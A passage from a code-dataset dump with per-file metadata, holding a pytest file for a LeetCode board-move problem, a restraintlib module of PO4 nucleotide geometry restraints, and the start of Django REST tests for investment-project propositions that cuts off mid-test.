hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fc20295b0f2fbb194d3cfebd73f5427747f68b3d | 3,306 | py | Python | tests/test_1958.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | ["MIT"] | null | null | null | tests/test_1958.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | ["MIT"] | null | null | null | tests/test_1958.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | ["MIT"] | null | null | null |
#!/usr/bin/env python
import pytest

"""
Test 1958. Check if Move is Legal
"""


@pytest.fixture(scope="session")
def init_variables_1958():
    from src.leetcode_1958_check_if_move_is_legal import Solution

    solution = Solution()

    def _init_variables_1958():
        return solution

    yield _init_variables_1958


class TestClass1958:
    def test_solution_0(self, init_variables_1958):
        assert init_variables_1958().checkMove(
            [
                [".", ".", ".", "B", ".", ".", ".", "."],
                [".", ".", ".", "W", ".", ".", ".", "."],
                [".", ".", ".", "W", ".", ".", ".", "."],
                [".", ".", ".", "W", ".", ".", ".", "."],
                ["W", "B", "B", ".", "W", "W", "W", "B"],
                [".", ".", ".", "B", ".", ".", ".", "."],
                [".", ".", ".", "B", ".", ".", ".", "."],
                [".", ".", ".", "W", ".", ".", ".", "."],
            ],
            4,
            3,
            "B",
        )

    def test_solution_1(self, init_variables_1958):
        assert not init_variables_1958().checkMove(
            [
                [".", ".", ".", ".", ".", ".", ".", "."],
                [".", "B", ".", ".", "W", ".", ".", "."],
                [".", ".", "W", ".", ".", ".", ".", "."],
                [".", ".", ".", "W", "B", ".", ".", "."],
                [".", ".", ".", ".", ".", ".", ".", "."],
                [".", ".", ".", ".", "B", "W", ".", "."],
                [".", ".", ".", ".", ".", ".", "W", "."],
                [".", ".", ".", ".", ".", ".", ".", "B"],
            ],
            4,
            4,
            "W",
        )
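Both tests drive `Solution.checkMove`, imported from `src.leetcode_1958_check_if_move_is_legal`, which is not included in this dump. For context, here is a minimal sketch of one way that method could be implemented (LeetCode 1958: a move is legal if the placed piece becomes an endpoint of a "good line" in any of the eight directions). The names and details below are illustrative, not the repository's actual code:

```python
from typing import List


class Solution:
    # Illustrative sketch only -- not the implementation from leetcode2github.
    def checkMove(self, board: List[List[str]], rMove: int, cMove: int, color: str) -> bool:
        opposite = "W" if color == "B" else "B"
        for dr, dc in [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 1), (1, -1), (1, 0), (1, 1)]:
            r, c = rMove + dr, cMove + dc
            steps = 1  # cells walked away from the placed piece
            # Walk across a run of opposite-colored cells...
            while 0 <= r < 8 and 0 <= c < 8 and board[r][c] == opposite:
                r, c = r + dr, c + dc
                steps += 1
            # ...which must end on our own color with at least one opposite cell in between.
            if steps > 1 and 0 <= r < 8 and 0 <= c < 8 and board[r][c] == color:
                return True
        return False
```

With this sketch, the first board above yields `True` for `checkMove(board, 4, 3, "B")` (the column of `W` cells above row 4 is capped by the `B` in row 0), and the second yields `False`.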
| 29.256637 | 65 | 0.263158 | 204 | 3,306 | 4.009804 | 0.181373 | 0.03912 | 0.290954 | 0.02934 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.045098 | 0.38294 | 3,306 | 112 | 66 | 29.517857 | 0.355882 | 0.012099 | 0 | 0.902439 | 0 | 0 | 0.086109 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 1 | 0.097561 | false | 0 | 0.04878 | 0.02439 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fc22a90b90d10dc72ce7d79a211c9228703d994d | 10,167 | py | Python | restraintlib/lib/PO4.py | mkowiel/restraintlib | 32de01d67ae290a45f3199e90c729acc258a6249 | ["BSD-3-Clause"] | null | null | null | restraintlib/lib/PO4.py | mkowiel/restraintlib | 32de01d67ae290a45f3199e90c729acc258a6249 | ["BSD-3-Clause"] | 1 | 2021-11-11T18:45:10.000Z | 2021-11-11T18:45:10.000Z | restraintlib/lib/PO4.py | mkowiel/restraintlib | 32de01d67ae290a45f3199e90c729acc258a6249 | ["BSD-3-Clause"] | null | null | null |
PO4_PDB_CODES = ['A', 'C', 'G', 'T', 'U', 'DA', 'DC', 'DG', 'DT', 'DU', 'IC', 'IG']

PO4_ATOM_NAMES = {
    'P': 'P',
    'OP1': 'OP1',
    'O1P': 'OP1',
    'OP2': 'OP2',
    'O2P': 'OP2',
    "O5'": "O5'",
    "O5*": "O5'",
    "O3'": "O3'",
    "O3*": "O3'",
    "C5'": "C5'",
    "C5*": "C5'",
    "C3'": "C3'",
    "C3*": "C3'",
}

PO4_ATOM_RES = {
    'P': 0,
    'OP1': 0,
    'OP2': 0,
    "O5'": 0,
    "O3'": -1,
    "C5'": 0,
    "C3'": -1,
}

PO4_REQUIRED_CONDITION = {
    ("P", "O3'", 2.0, 0, -1),
    ("P", "O5'", 2.0, 0, 0),
    ("P", "OP1", 2.0, 0, 0),
    ("P", "OP2", 2.0, 0, 0),
    ("C3'", "O3'", 2.0, -1, -1),
    ("C5'", "O5'", 2.0, 0, 0),
}

PO4_DISTANCE_MEASURE = {
    'measure': 'euclidean_angles',
    'restraint_names': ['aO1O2', 'aO1O3', 'aO1O5', 'aO2O3', 'aO2O5', 'aO3O5']
}

PO4_CONDITION_DISTANCE_MEASURE = {
    'measure': 'euclidean_angles',
    'restraint_names': ['tC3O3P4O5', 'tC5O5P4O3']
}
PO4_RESTRAINTS = [
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -66.636, 7.779],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 171.37, 14.971]
        ],
        "name": "PO4==AA_0",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 106.2, 1.1],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 110.2, 1.3],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 112.2, 1.0],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 109.3, 0.9],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
            ["dist", "dO1P4", ["OP1", "P"], 1.487, 0.01],
            ["dist", "dO2P4", ["OP2", "P"], 1.483, 0.01],
            ["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
            ["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 171.37, 14.971],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -66.636, 7.779]
        ],
        "name": "PO4==AA_1",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 109.3, 0.9],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 112.2, 1.0],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 110.2, 1.3],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 106.2, 1.1],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
            ["dist", "dO1P4", ["OP1", "P"], 1.483, 0.01],
            ["dist", "dO2P4", ["OP2", "P"], 1.487, 0.01],
            ["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
            ["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -171.37, 14.971],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 66.636, 7.779]
        ],
        "name": "PO4==AA_2",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 110.2, 1.3],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 106.2, 1.1],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 109.3, 0.9],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 112.2, 1.0],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
            ["dist", "dO1P4", ["OP1", "P"], 1.487, 0.01],
            ["dist", "dO2P4", ["OP2", "P"], 1.483, 0.01],
            ["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
            ["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 66.636, 7.779],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -171.37, 14.971]
        ],
        "name": "PO4==AA_3",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 117.6, 1.2],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 112.2, 1.0],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 109.3, 0.9],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 106.2, 1.1],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 110.2, 1.3],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 99.9, 0.7],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.2, 1.5],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 121.7, 3.0],
            ["dist", "dO1P4", ["OP1", "P"], 1.483, 0.01],
            ["dist", "dO2P4", ["OP2", "P"], 1.487, 0.01],
            ["dist", "dO3P4", ["O3'", "P"], 1.601, 0.008],
            ["dist", "dO5P4", ["O5'", "P"], 1.591, 0.004],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.422, 0.010],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.428, 0.013]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -69.896, 9.625],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -68.72, 8.686]
        ],
        "name": "PO4==AS_0",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 104.5, 0.9],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 110.3, 0.8],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 111.5, 1.1],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 105.2, 0.8],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
            ["dist", "dO1P4", ["OP1", "P"], 1.484, 0.012],
            ["dist", "dO2P4", ["OP2", "P"], 1.478, 0.01],
            ["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
            ["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], -68.72, 8.686],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], -69.896, 9.625]
        ],
        "name": "PO4==AS_1",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 105.2, 0.8],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 111.5, 1.1],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 110.3, 0.8],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 104.5, 0.9],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
            ["dist", "dO1P4", ["OP1", "P"], 1.478, 0.01],
            ["dist", "dO2P4", ["OP2", "P"], 1.484, 0.012],
            ["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
            ["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 68.72, 8.686],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 69.896, 9.625]
        ],
        "name": "PO4==AS_2",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 110.3, 0.8],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 104.5, 0.9],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 105.2, 0.8],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 111.5, 1.1],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
            ["dist", "dO1P4", ["OP1", "P"], 1.484, 0.012],
            ["dist", "dO2P4", ["OP2", "P"], 1.478, 0.01],
            ["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
            ["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
        ]
    },
    {
        "conditions": [
            ["torsion", "tC3O3P4O5", ["O5'", "P", "O3'", "C3'"], 69.896, 9.625],
            ["torsion", "tC5O5P4O3", ["O3'", "P", "O5'", "C5'"], 68.72, 8.686]
        ],
        "name": "PO4==AS_3",
        "restraints": [
            ["angle", "aO1O2", ["OP1", "P", "OP2"], 119.9, 1.6],
            ["angle", "aO1O3", ["OP1", "P", "O3'"], 111.5, 1.1],
            ["angle", "aO1O5", ["OP1", "P", "O5'"], 105.2, 0.8],
            ["angle", "aO2O3", ["OP2", "P", "O3'"], 104.5, 0.9],
            ["angle", "aO2O5", ["OP2", "P", "O5'"], 110.3, 0.8],
            ["angle", "aO3O5", ["O3'", "P", "O5'"], 104.2, 1.5],
            ["angle", "aP4O3C3", ["P", "O3'", "C3'"], 120.7, 2.9],
            ["angle", "aP4O5C5", ["P", "O5'", "C5'"], 119.3, 1.5],
            ["dist", "dO1P4", ["OP1", "P"], 1.478, 0.01],
            ["dist", "dO2P4", ["OP2", "P"], 1.484, 0.012],
            ["dist", "dO3P4", ["O3'", "P"], 1.603, 0.014],
            ["dist", "dO5P4", ["O5'", "P"], 1.594, 0.009],
            ["dist", "dO3C3", ["O3'", "C3'"], 1.438, 0.007],
            ["dist", "dO5C5", ["O5'", "C5'"], 1.437, 0.017]
        ]
    }
]
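Each entry in `PO4_RESTRAINTS` is gated by a pair of torsion-angle conditions (a mean and a sigma per torsion), so a consumer has to pick the group whose conditions match the measured torsions. A minimal sketch of that selection logic, assuming a simple n-sigma window on a circular angle scale (this helper and its names are illustrative, not part of RestraintLib's API; the means/sigmas are copied from the `PO4==AA_0` and `PO4==AA_1` entries above):

```python
# Torsion means/sigmas copied from the first two PO4_RESTRAINTS entries above.
PO4_TORSION_CONDITIONS = {
    'PO4==AA_0': {'tC3O3P4O5': (-66.636, 7.779), 'tC5O5P4O3': (171.37, 14.971)},
    'PO4==AA_1': {'tC3O3P4O5': (171.37, 14.971), 'tC5O5P4O3': (-66.636, 7.779)},
}


def match_restraint_group(torsions, conditions=PO4_TORSION_CONDITIONS, n_sigma=3.0):
    """Return the name of the first group whose torsion conditions all match."""
    def within(value, mean, sigma):
        # Compare angles on the circle, so 179 and -179 degrees are 2 degrees apart.
        diff = (value - mean + 180.0) % 360.0 - 180.0
        return abs(diff) <= n_sigma * sigma

    for name, cond in conditions.items():
        if all(within(torsions[t], mean, sigma) for t, (mean, sigma) in cond.items()):
            return name
    return None
```

For example, measured torsions of roughly -66.6 and 171.4 degrees would select `PO4==AA_0`, while values outside every window return `None`.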
| 43.26383 | 83 | 0.349562 | 1,295 | 10,167 | 2.724324 | 0.088031 | 0.034864 | 0.022676 | 0.063492 | 0.927438 | 0.910998 | 0.90873 | 0.729025 | 0.729025 | 0.729025 | 0 | 0.220017 | 0.306187 | 10,167 | 234 | 84 | 43.448718 | 0.280125 | 0 | 0 | 0.46696 | 0 | 0 | 0.267559 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fc24b479a0baafd8d1cb1e42bd8123cb5b0d2696 | 93,292 | py | Python | datahub/investment/project/proposition/test/test_views.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | ["MIT"] | 6 | 2019-12-02T16:11:24.000Z | 2022-03-18T10:02:02.000Z | datahub/investment/project/proposition/test/test_views.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | ["MIT"] | 1,696 | 2019-10-31T14:08:37.000Z | 2022-03-29T12:35:57.000Z | datahub/investment/project/proposition/test/test_views.py | Staberinde/data-hub-api | 3d0467dbceaf62a47158eea412a3dba827073300 | ["MIT"] | 9 | 2019-11-22T12:42:03.000Z | 2021-09-03T14:25:05.000Z |
import datetime
import uuid
from unittest.mock import patch

import factory
import pytest
from django.utils.timezone import utc
from freezegun import freeze_time
from rest_framework import status
from rest_framework.reverse import reverse

from datahub.company.test.factories import AdviserFactory
from datahub.core.test_utils import APITestMixin, create_test_user, format_date_or_datetime
from datahub.documents.models import Document, UploadStatus
from datahub.investment.project.proposition.constants import PropositionStatus
from datahub.investment.project.proposition.models import (
    Proposition,
    PropositionDocument,
    PropositionDocumentPermission,
    PropositionPermission,
)
from datahub.investment.project.proposition.test.factories import PropositionFactory
from datahub.investment.project.test.factories import InvestmentProjectFactory
from datahub.metadata.test.factories import TeamFactory
from datahub.user_event_log.constants import UserEventType
from datahub.user_event_log.models import UserEvent

NON_RESTRICTED_VIEW_PERMISSIONS = (
    (
        PropositionPermission.view_all,
        PropositionDocumentPermission.view_all,
    ),
    (
        PropositionPermission.view_all,
        PropositionDocumentPermission.view_all,
        PropositionPermission.view_associated,
        PropositionDocumentPermission.view_associated,
    ),
)

NON_RESTRICTED_ADD_PERMISSIONS = (
    (
        PropositionPermission.add_all,
        PropositionDocumentPermission.add_all,
    ),
    (
        PropositionPermission.add_all,
        PropositionDocumentPermission.add_all,
        PropositionPermission.add_associated,
        PropositionDocumentPermission.add_associated,
    ),
)

NON_RESTRICTED_CHANGE_PERMISSIONS = (
    (
        PropositionPermission.change_all,
        PropositionDocumentPermission.change_all,
    ),
    (
        PropositionPermission.change_all,
        PropositionDocumentPermission.change_all,
        PropositionPermission.change_associated,
        PropositionDocumentPermission.change_associated,
    ),
)

NON_RESTRICTED_DELETE_PERMISSIONS = (
    (
        PropositionPermission.delete_all,
        PropositionDocumentPermission.delete_all,
    ),
    (
        PropositionPermission.delete_all,
        PropositionDocumentPermission.delete_all,
        PropositionDocumentPermission.delete_associated,
    ),
)
class TestCreateProposition(APITestMixin):
    """Tests for the create proposition view."""

    @pytest.mark.parametrize('permissions', NON_RESTRICTED_ADD_PERMISSIONS)
    def test_can_create_proposition(self, permissions):
        """Test creating proposition."""
        investment_project = InvestmentProjectFactory()
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': investment_project.pk,
            },
        )
        adviser = create_test_user(
            permission_codenames=permissions,
        )
        api_client = self.create_api_client(user=adviser)
        response = api_client.post(
            url,
            {
                'name': 'My proposition.',
                'scope': 'Very broad scope.',
                'adviser': adviser.pk,
                'deadline': '2018-02-10',
            },
        )
        assert response.status_code == status.HTTP_201_CREATED
        response_data = response.json()
        instance = Proposition.objects.get(pk=response_data['id'])
        assert instance.created_by == adviser
        assert instance.modified_by == adviser
        assert response_data == {
            'id': str(instance.pk),
            'investment_project': {
                'name': investment_project.name,
                'project_code': investment_project.project_code,
                'id': str(investment_project.pk),
            },
            'adviser': {
                'first_name': adviser.first_name,
                'last_name': adviser.last_name,
                'name': adviser.name,
                'id': str(adviser.pk),
            },
            'deadline': '2018-02-10',
            'status': PropositionStatus.ONGOING,
            'name': 'My proposition.',
            'scope': 'Very broad scope.',
            'details': '',
            'created_on': format_date_or_datetime(instance.created_on),
            'created_by': {
                'first_name': instance.created_by.first_name,
                'last_name': instance.created_by.last_name,
                'name': instance.created_by.name,
                'id': str(instance.created_by.pk),
            },
            'modified_by': {
                'first_name': instance.modified_by.first_name,
                'last_name': instance.modified_by.last_name,
                'name': instance.modified_by.name,
                'id': str(instance.modified_by.pk),
            },
            'modified_on': format_date_or_datetime(instance.modified_on),
        }

    @pytest.mark.parametrize('permissions', NON_RESTRICTED_ADD_PERMISSIONS)
    def test_cannot_create_proposition_for_non_existent_investment_project(self, permissions):
        """Test user cannot create proposition for non existent investment project."""
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': uuid.uuid4(),
            },
        )
        adviser = create_test_user(
            permission_codenames=permissions,
        )
        api_client = self.create_api_client(user=adviser)
        response = api_client.post(
            url,
            {
                'name': 'My proposition.',
                'scope': 'Very broad scope.',
                'adviser': adviser.pk,
                'deadline': '2018-02-10',
            },
        )
        assert response.status_code == status.HTTP_404_NOT_FOUND
        response_data = response.json()
        assert response_data == {'detail': 'Not found.'}

    def test_restricted_user_can_create_associated_investment_project_proposition(self):
        """Test restricted user can create associated investment project proposition."""
        project_creator = AdviserFactory()
        investment_project = InvestmentProjectFactory(created_by=project_creator)
        url = reverse(
            'api-v3:investment:proposition:collection',
            kwargs={
                'project_pk': investment_project.pk,
            },
        )
        adviser = create_test_user(
            permission_codenames=[PropositionPermission.add_associated],
            dit_team=project_creator.dit_team,
        )
        api_client = self.create_api_client(user=adviser)
        response = api_client.post(
            url,
            {
                'name': 'My proposition.',
                'scope': 'Very broad scope.',
                'adviser': adviser.pk,
                'deadline': '2018-02-10',
            },
        )
        assert response.status_code == status.HTTP_201_CREATED
        response_data = response.json()
        instance = Proposition.objects.get(pk=response_data['id'])
        assert instance.created_by == adviser
        assert instance.modified_by == adviser
        assert response_data == {
            'id': str(instance.pk),
            'investment_project': {
                'name': investment_project.name,
                'project_code': investment_project.project_code,
                'id': str(investment_project.pk),
            },
            'adviser': {
                'first_name': adviser.first_name,
                'last_name': adviser.last_name,
                'name': adviser.name,
                'id': str(adviser.pk),
            },
            'deadline': '2018-02-10',
            'status': PropositionStatus.ONGOING,
            'name': 'My proposition.',
            'scope': 'Very broad scope.',
            'details': '',
            'created_on': format_date_or_datetime(instance.created_on),
            'created_by': {
                'first_name': instance.created_by.first_name,
                'last_name': instance.created_by.last_name,
                'name': instance.created_by.name,
                'id': str(instance.created_by.pk),
            },
            'modified_by': {
                'first_name': instance.modified_by.first_name,
                'last_name': instance.modified_by.last_name,
                'name': instance.modified_by.name,
                'id': str(instance.modified_by.pk),
            },
            'modified_on': format_date_or_datetime(instance.modified_on),
        }

    def test_restricted_user_cannot_create_non_associated_investment_project_proposition(self):
        """Test restricted user cannot create non associated investment project proposition."""
        project_creator = AdviserFactory()
